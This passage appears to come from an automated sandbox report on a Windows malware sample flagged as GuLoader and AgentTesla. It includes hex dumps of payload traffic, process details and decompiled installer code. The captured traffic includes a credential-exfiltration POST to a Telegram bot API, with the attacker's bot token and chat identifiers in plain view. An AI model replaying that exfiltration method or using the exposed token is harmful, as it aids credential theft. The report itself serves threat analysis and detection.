2022-05-10 12:06:36 UTC	133	IN	Data Raw: 2c 22 8a b6 da 40 12 34 31 d3 52 5a fe e1 3d 4c 05 26 e2 71 22 3d 72 60 e7 91 41 70 52 de b9 95 b9 74 a1 69 30 74 84 a7 08 81 ba 03 5f d3 7d f5 5b a0 60 d1 68 b2 de 0c 32 70 be ee 7b e8 8f 36 90 a0 bb 35 10 71 ab d1 c2 c9 6e 5d 26 80 25 f6 46 f2 14 01 06 ad 03 03 99 4c 10 c8 da 7a 80 de 32 ff 33 d2 09 a4 80 fd aa 92 76 5d 95 1a 6f bc 99 f3 1f 5a 20 6c 34 28 f2 44 80 56 d0 76 12 3a bd 80 c1 89 08 a0 71 bd 7f 78 18 a2 7f f0 60 b2 fd 5e f0 d7 1f 7c e7 8b 14 b1 4a f8 de ad 47 b8 66 4e e5 45 30 6a 34 44 7c 60 98 30 2e 56 67 89 f3 0c e5 71 00 41 ae 11 21 f5 35 b9 04 d1 d3 21 5e 2a 76 39 d4 bd fb 04 22 93 68 d8 0f 96 03 88 d3 b7 e5 61 6b 09 bc b6 4e 7d c6 ce 71 7f 45 e2 2a 9f a8 5e 63 c7 a4 b4 f3 95 b6 db 5e c8 a7 cb 2c 9d 3e b2 52 46 66 14 01 0c fc fa a6 7f a8 Data Ascii: ,"@41RZ=L&q"=r`ApRti0t_}[`h2p{65qn]&%FLz23v]oZ l4(DVv:qx`^\|JGfNE0j4D\|`0.VgqA!5!^v9"hakN}qE^c^,>RFf
2022-05-10 12:06:36 UTC	140	IN	Data Raw: b8 c8 f3 3e 65 20 d4 ea 4f 66 2e bc f7 e1 1f 14 24 57 c9 a0 8e 32 94 70 81 17 b8 a9 a9 fd 93 2a b6 81 dc bf dd 36 31 f3 cb e0 d5 e1 27 79 d4 de e3 77 0e 95 8e 7f 87 90 45 54 92 10 bb 95 23 cb a9 55 07 72 44 69 0a 81 9a 9e ee f8 7d ec 6f 71 98 d0 6e 9e 76 f0 2d 10 bf ea 5f 29 5e 34 90 3a 04 3d 2c 46 ad 10 13 cb 6e 7d c6 2f 0e f6 58 c4 c5 f9 07 ab 2f ab 61 53 70 c9 de 5e 42 0e 30 ff a9 6d 01 98 b4 fb 68 42 74 5d b5 f2 c8 97 99 ed 28 aa 09 95 33 02 72 10 63 29 b1 73 32 dd 9c 52 c3 13 2d 17 46 b6 4e bd 39 70 7d d0 b0 8e 39 75 ef cb 2b ad 1f 8a 12 9d e6 04 c1 cd 46 bc 42 8a 37 47 30 f0 8b 4c 43 57 9e f4 fc 54 67 a9 3f da ce 71 1f 41 ae 11 21 f5 35 b9 00 d1 d3 21 5e 2a 76 08 d7 bd fb 04 22 93 6b d8 0f a7 00 88 d3 b7 3d 57 6b 09 bd 90 9f 85 c7 c8 5d d3 bd fd 4a Data Ascii: >e Of.$W2p61'ywET#UrDi}oqnv-_)^4:=,Fn}/X/aSp^B0mhBt](3rc)s2R-FN9p}9u+FB7G0LCWTg?qA!5!^v"k=Wk]J
2022-05-10 12:06:36 UTC	148	IN	Data Raw: ea 92 54 77 dc 27 bc 65 7e c4 d2 d1 44 a0 cd 05 71 c1 43 af 36 a0 4f cf c1 fc c0 38 2e e2 a9 b8 44 3b 6f 21 f3 3c 48 6f 31 b5 f3 cf ee 10 22 41 e3 78 c8 59 89 6a 9f 25 7f b0 bb e1 4b 3c dc a1 bc e0 1a 39 55 8c e6 3d 84 8e 50 17 f8 56 88 71 75 d2 64 74 fe 8a 5e 35 df bc a8 f3 40 30 ee 6e 14 97 a1 6a ce 58 46 32 aa 1e b3 2d bb 91 e6 25 aa 51 94 bd 85 bd 65 76 a5 c9 58 e2 44 e2 5d c5 d5 b1 33 fb 72 7f d7 b7 2d 2d 8b 44 ef 6a 53 a9 b7 70 f3 2b 53 f2 b6 12 01 e5 c2 09 95 5e 0b 5a f0 68 7a 00 95 45 ce d8 36 54 ff 2b 0b 2b 95 3f b0 f3 a7 9e e8 a0 3e e8 5f e5 a5 4c 23 02 5f 86 b4 77 98 63 a6 65 e6 5e 82 3f 43 5e 0c a8 05 3f c2 6f 0d 7e fb 75 23 6a 4f 4e a4 5c a7 4c 03 a1 d5 ea 0a 71 77 3b f4 90 67 19 25 c0 5a 46 90 30 49 09 c8 a2 7a ae 49 c3 de f0 e4 7e 1b 68 28 Data Ascii: Tw'e~DqC6O8.D;o!<Ho1"AxYj%K<9U=PVqudt^5@0njXF2-%QevXD]3r--DjSp+S^ZhzE6T++?>_L#_wce^?C^?o~u#jON\Lqw;g%ZF0IzI~h(
2022-05-10 12:06:36 UTC	156	IN	Data Raw: d7 4a 86 56 1c be 23 cb 75 81 ac 48 e7 5b d3 be 69 99 ec 4e 6a bf f5 7c 46 47 6f 9d 27 8b f2 5a 18 3c ec 19 8b 9e 37 1e fc e6 76 96 8e 32 37 ef 1b e9 1d 2e 13 6b b5 85 b7 47 48 a2 9c e8 3e 21 65 fd f4 86 64 64 2f a3 f9 4c e1 15 24 7c e1 ff f0 a5 95 72 84 37 76 f7 ab fd 09 22 99 71 fa 69 13 36 30 f3 eb dc f7 e1 27 49 fe c2 e2 81 08 bd 0d 01 e6 17 47 50 b2 f2 bb 7c 23 a7 8c 78 17 54 64 16 0a 4d 9b a3 43 2a 7d 1a 73 5b 61 d1 6e 54 5d 72 53 6c be 13 5b 0b 8f 34 90 3a 9e cc 07 57 8b 2d c3 32 6e 71 e7 9e 25 f6 58 2c ec 00 06 b6 29 7a e7 3e 10 ca de 5a 62 d8 35 ff a9 ea 24 4e a6 ca 49 91 77 5d b5 1e 72 bc 99 c0 35 58 21 75 33 00 74 3a e1 72 d2 72 32 c4 bc 82 c0 0a 2c 8f 63 9b 5f 1e 1e a2 7f cd b0 a8 fc 7d ee c9 37 85 e6 d7 10 9b cc 9b bf a2 46 95 47 a8 e4 45 30 Data Ascii: JV#uH[iNj\|FGo'Z<7v27.kGH>!edd/L$\|r7v"qi60'IGP\|#xTdMC*}s[anT]rSl[4:W-2nq%X,)z>Zb5$NIw]r5X!u3t:rr2,c_}7FGE0
2022-05-10 12:06:36 UTC	164	IN	Data Raw: 4e 26 01 08 6e 9f f5 36 57 9f 1f bb 5c f1 4c 1b 8f 26 57 dd 44 5e 97 5a 5e 51 b3 1b 58 14 d7 59 86 34 0a 7c 38 8c 75 db 99 90 e7 59 d3 ad 69 ad e9 8c 71 e5 f5 5a 71 9c 6f 9f 27 98 f2 45 01 fe f7 43 8b 20 0e f2 fc e3 76 85 8e 3f 34 2d 00 b3 1d f4 28 85 b5 80 b7 54 48 2b 82 2a 25 7b 65 10 c9 73 64 66 2e b0 f9 f7 e2 d7 3f 16 e3 d2 ce 52 95 70 85 24 76 21 b4 3f 12 48 9b 8c bb 9e 13 34 31 e0 eb c6 fa 23 3c 23 fc 13 a0 76 08 bf 0c 12 e6 2f 58 92 a9 98 b9 39 66 50 8c 78 16 47 64 6a 09 ab 98 f9 43 f7 3b ed 73 59 61 c2 6e 32 58 b0 48 36 be a6 12 08 8e 36 90 29 9e f0 1c 95 90 77 c3 31 25 7c e6 9c 25 e5 58 0e e9 c2 1d ec 29 9d aa 2c 11 80 de 49 62 ac 13 3d b2 b0 24 3d e8 dc 48 93 76 4e b5 d7 76 7e 82 aa 37 f3 70 6d 32 02 74 29 e1 f7 f6 b0 29 9e bc 04 93 12 2d 8d 63 Data Ascii: N&n6W\L&WD^Z^QXY4\|8uYiqZqo'EC v?4-(TH+*%{esdf.?Rp$v!?H41#<#v/X9fPxGdjC;sYan2XH66)w1%\|%X),Ib=$=HvNv~7pm2t))-c
2022-05-10 12:06:36 UTC	172	IN	Data Raw: 48 f8 04 f3 81 f8 29 9d 85 b7 b2 0c 8f ab e8 ae c2 5a ee 73 59 74 d5 31 d5 30 07 13 cf 29 4c 76 01 95 44 45 e0 f4 4c 4e 1f b8 6d c5 4e 4b 8f 85 7d 69 47 9c 8c 8b 5e cf 94 2f 5a 44 d7 98 ac 98 1d be 23 5d 75 04 af a4 e5 09 d3 4a 43 4f ea 4e 6a 34 f5 f1 53 a8 6d cf 27 9d d9 ae 19 3c ec 92 8b 3d 34 c6 fe b3 76 a1 a5 37 30 ef 1b 62 1d 89 06 b1 b7 d0 b7 1f 63 85 9e e8 3e aa 65 b7 f7 47 66 36 2e d9 d2 cb e6 15 24 c7 e3 c1 e5 66 97 20 85 ab 5d a9 a9 fd 09 99 9b 51 f9 aa 11 64 31 4e c0 44 fe e1 27 f2 fc 9e f5 42 0a ef 0c de cd 93 45 50 b2 49 b9 7e 20 64 8e 28 16 55 48 a4 08 81 9a 28 43 27 65 d9 71 09 61 f2 42 9a 5c 72 53 e7 be ff 5f 3c 8c 66 90 7e b2 1a 01 57 8b a6 c3 7e 72 48 e4 cc 25 90 74 d8 ed 00 06 3d 29 c8 e3 18 13 98 de d2 4e dd 32 ff a9 61 24 20 bb e8 4a Data Ascii: H)ZsYt10)LvDELNmNK}iG^/ZD#]uJCONj4Sm'<=4v70bc>eGf6.$f ]Qd1ND'BEPI~ d(UH(C'eqaB\rS_<f~W~rH%t=)N2a$ J
2022-05-10 12:06:36 UTC	180	IN	Data Raw: 15 93 d7 06 d0 b4 cb 78 c4 76 29 90 d0 90 9c 5b be 66 b8 b5 32 7f 7d f0 85 61 c3 46 48 31 5b 9d 0c 4c 82 fe 03 79 82 e0 b6 bb 8b f1 f9 21 c3 ab ef d7 60 b1 dd 18 d0 bd 26 81 df dd 4e f6 27 c1 7a db e0 ff 61 95 11 2b 6e 93 54 f3 9b a4 56 aa 47 73 98 0c 5a 61 ac ee 4c c5 d2 51 a7 03 19 67 26 d0 54 de a8 00 e6 23 c2 fd 7c ac ef 55 4b b1 f5 53 43 86 4e 8c 27 72 f7 16 35 a5 e8 05 8d cf 32 6a f8 e2 70 68 87 59 25 ee 1d 0f 0f 8f 06 85 b3 b0 96 3d 5d 9e 98 4a 2b bc 70 d1 f1 69 45 75 2e a2 ff 73 ca 8c 20 c0 e2 58 e1 f6 80 51 83 ac 5b 00 a1 61 09 14 ba 83 fa 4e 16 2f 10 e0 eb 9f fb fa 06 77 fc ae e1 5f 1a 91 0d 9d e6 77 42 63 a4 ce bd 35 0e 02 9a 21 17 f3 47 a0 03 d8 9b 8d 4e e6 70 dd 75 42 40 11 6e a9 5a e8 47 5d b8 d3 5d 12 af 25 90 7b 98 03 20 44 8b 31 c5 89 4f Data Ascii: xv)[f2}aFH1[Ly!`&N'za+nTVGsZaLQg&T#\|UKSCN'r52jphY%=]J+piEu.s XQ[aN/w_wBc5!GNpuB@nZG]]%{ D1O
2022-05-10 12:06:36 UTC	187	IN	Data Raw: 84 ec 6c 3b 64 b0 42 bd e6 c4 cf 09 c4 22 59 58 7f 1d 89 45 9a 7c 21 dc e6 e8 ea 16 4c 52 75 a7 96 6d bf d8 a4 79 b1 ec 58 5d b0 d0 cc 23 d1 d4 cd bc 62 20 0b bd e4 a0 97 b3 18 ff 2f af 6a c6 81 d5 66 eb da ff d3 f4 eb 22 8f 9b 92 7f 80 6b 1a 1b b0 77 bc c3 6b 7c 93 7d 20 42 6d 7e 6e 14 81 92 29 90 7e d9 0a 9c 29 1b c8 50 23 26 28 f8 f9 71 3b 89 e0 74 3c 78 b2 4a d4 ef 73 ca 4a a6 10 13 d5 e1 82 11 b2 d0 0d 21 8f 4e 38 c7 99 df 27 ee 0a d7 46 e5 96 c0 7c 3c af 76 ee 31 43 96 b4 82 18 f2 e2 50 30 a8 7e 80 49 85 63 e1 f3 f2 d8 2a 00 e6 f0 8c 52 59 65 48 95 1c 00 0a 4b a3 ab ac 85 61 45 3f 84 4e 95 53 d1 1f f2 59 1a c4 c8 99 4f 66 f7 f5 fa db 76 58 54 87 8e 00 97 8d 42 64 bf 48 8c 04 67 d3 69 01 81 f4 31 0f ff be d0 fb 6e 3e e8 0d 7a 31 64 f6 7a ee f9 db 30 Data Ascii: l;dB"YXE\|!LRumyX]#b /jf"kwk\|} Bm~n)~)P#&(q;t<xJsJ!N8'F\|<v1CP0~Ic*RYeHKaE?NSYOfvXTBdHgi1n>z1dz0
2022-05-10 12:06:36 UTC	195	IN	Data Raw: 9b 9b 9b d9 98 28 ef 25 08 a8 8e 31 6d 20 08 25 02 86 3f de 33 7a c0 15 ad fe 0e b9 c4 a0 ab e2 6b 26 05 b5 4b ac b9 c4 de 1c ef 28 4e 43 69 3d 92 5c 8f 67 21 8a f4 ff f7 28 7c 5b 74 ce ad 4d b2 d9 9a 68 a2 e3 5e 50 a7 b4 ca 12 cc d7 c8 a7 11 0c 06 a7 e4 ee a6 a4 28 90 09 b4 75 d7 e4 df 2d cb e0 cf c6 9a dd 2b 8b ff 81 66 82 4b 16 0e a1 31 94 d6 77 7d b5 78 0f 4a 6d 4f 0b 3f 94 f4 1b aa 76 c3 0b b1 20 77 db 50 2f 1f 47 fb e9 69 01 88 ef 74 3d 66 83 2f fe ee 1d f9 46 bf 21 22 d4 e5 e7 1e b6 ca 3e 24 84 2a 05 d5 a1 df 3e e9 6f dd 52 8b b1 d9 19 78 99 04 ce 25 37 b5 89 e3 31 e3 8e 7d 45 ef 7a 81 1d 9e 66 84 d6 f5 b7 23 3d 87 fb 9d 3e 5a 10 20 93 07 64 24 58 a3 ba bf e6 51 52 51 a6 54 f0 15 e3 70 c2 41 76 e3 df fd 6e 6a ef cf 9e f4 60 5a 50 85 eb 35 9b 95 78 Data Ascii: (%1m %?3zk&K(NCi=\g!(\|[tMh^P(u-+fK1w}xJmO?v wP/Git=f/F!">$*>oRx%71}Ezf#=>Z d$XQRQTpAvnj`ZP5x
2022-05-10 12:06:36 UTC	203	IN	Data Raw: 5a 9d 03 2e 28 10 56 1e f6 b8 f3 ef 94 8b 64 5f b2 3c 26 e4 e1 d8 af fb 40 6d 99 43 38 38 f2 fa fd bf 18 86 8b 43 d6 f4 e9 52 06 5d fc 31 0c d3 2f a2 65 1a ab f6 ca 8d 09 d5 95 cf da 88 3e 52 17 52 87 d5 e6 94 bf 6f 01 91 2e 23 8c 7a e9 26 f1 1e 39 8a e8 9a e4 77 47 3e 7e a7 ac 28 c3 aa c1 12 de 88 27 34 c9 c2 04 8a a5 a2 af a6 03 c0 38 da 81 a3 de d9 41 95 47 c8 17 20 c0 a1 04 96 8b aa b7 87 8a 53 ef 87 dd 0f fc 9f af 64 a0 2c d0 a1 07 1a d5 01 4b 3b 04 18 69 46 ee e7 4b de 0a a5 ee 2d 4d 15 9a 27 d7 b6 46 92 82 15 43 cf 89 13 58 15 c2 58 06 47 1c b0 2d bc 72 77 b9 83 67 84 d2 ab 7b cc e6 4d 64 ac f7 a6 48 81 7a 8d a7 56 f3 be 98 34 f9 16 0a 5c 34 fd f2 e1 64 e3 9c 40 22 9a 09 81 0f 89 01 f1 a7 f5 a5 32 5a f2 8c 9d 2c 49 77 55 e6 07 76 13 3c d6 eb bc f4 Data Ascii: Z.(Vd_<&@mC88CR]1/e>RRo.#z&9wG>~('48AG Sd,K;iFK-M'FCXXG-rwg{MdHzV4\4d@"2Z,IwUv<

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49749	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-10 12:06:49 UTC	210	OUT	POST /bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da3291ed28542f Host: api.telegram.org Content-Length: 1026 Expect: 100-continue Connection: Keep-Alive
2022-05-10 12:06:49 UTC	210	IN	HTTP/1.1 100 Continue
2022-05-10 12:06:49 UTC	210	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 32 39 31 65 64 32 38 35 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 36 35 34 37 31 36 37 33 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 32 39 31 65 64 32 38 35 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 34 33 36 34 33 32 0a 4f 53 46 75 6c 6c Data Ascii: -----------------------------8da3291ed28542fContent-Disposition: form-data; name="chat_id"765471673-----------------------------8da3291ed28542fContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/436432OSFull
2022-05-10 12:06:49 UTC	211	OUT	Data Raw: 0d 0a Data Ascii:
2022-05-10 12:06:49 UTC	211	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 10 May 2022 12:06:49 GMT Content-Type: application/json Content-Length: 633 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":534,"from":{"id":2052954011,"is_bot":true,"first_name":"Oluwa","username":"Oluwa007bot"},"chat":{"id":765471673,"first_name":"Olivia","last_name":"Cherry","username":"Olivia7G","type":"private"},"date":1652184409,"document":{"file_name":"user-436432 2022-05-10 02-29-13.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAICFmJ6VVnUOAPIuuetmek59aU-zWwCAAIHDAACz9vQU3xa2ye2BXeXJAQ","file_unique_id":"AgADBwwAAs_b0FM","file_size":453},"caption":"New PW Recovered!\n\nUser Name: user/436432\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 2916, Parent PID: 7896

General

Target ID:	1
Start time:	14:06:08
Start date:	10/05/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	562640 bytes
MD5 hash:	2BEB53482DE8F6A713DEB6FA9F9E7267
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 7544, Parent PID: 2916

General

Target ID:	3
Start time:	14:06:24
Start date:	10/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x540000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 7828, Parent PID: 2916

General

Target ID:	4
Start time:	14:06:24
Start date:	10/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x290000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 5720, Parent PID: 2916

General

Target ID:	5
Start time:	14:06:24
Start date:	10/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x340000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 8436, Parent PID: 2916

General

Target ID:	6
Start time:	14:06:25
Start date:	10/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x970000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000000.4202992291.0000000000D50000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 8960, Parent PID: 8436

General

Target ID:	7
Start time:	14:06:25
Start date:	10/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff60d220000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 2916, Parent PID: 7896COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	25.1%
Signature Coverage:	24.3%
Total number of Nodes:	1258
Total number of Limit Nodes:	67

Executed Functions

Function 004034F7 Relevance: 81.0, APIs: 33, Strings: 13, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				signed int _t234;
				WCHAR* _t235;

				0x435000 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a2d8 = _v324.dwBuildNumber;
				 *0x42a2dc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a2de != 0x600) {
					_t180 = E004068D4(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E00406864(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E004068D4(0xb);
				 *0x42a224 = E004068D4(9);
				_t88 = E004068D4(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a2dc =  *0x42a2dc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x42a2e0 = _t88;
				SHGetFileInfoW(0x4216c8, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406507(0x429220, L"NSIS Error");
				E00406507(0x435000, GetCommandLineW());
				_t94 = 0x435000;
				_t234 = 0x22;
				 *0x42a220 = 0x400000;
				if( *0x435000 == _t234) {
					_t94 = 0x435002;
				}
				_t199 = CharNextW(E00405E03(_t94, 0x435000));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E03(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406507(0x435800, _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034C6(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403ADC();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x42a2b4 == _t189) {
														L77:
														_t120 =  *0x42a2cc;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E004068D4(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B67(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a23c == _t189) {
												L51:
												 *0x42a2cc =  *0x42a2cc | 0xffffffff;
												_v24 = E00403BB6(_t265);
												goto L68;
											}
											_t219 = E00405E03(0x435000, _t189);
											if(_t219 < 0x435000) {
												L48:
												_t264 = _t219 - 0x435000;
												_v8 = L"Error launching installer";
												if(_t219 < 0x435000) {
													_t190 = E00405AD2(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x436800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AB5();
														} else {
															E00405A38();
														}
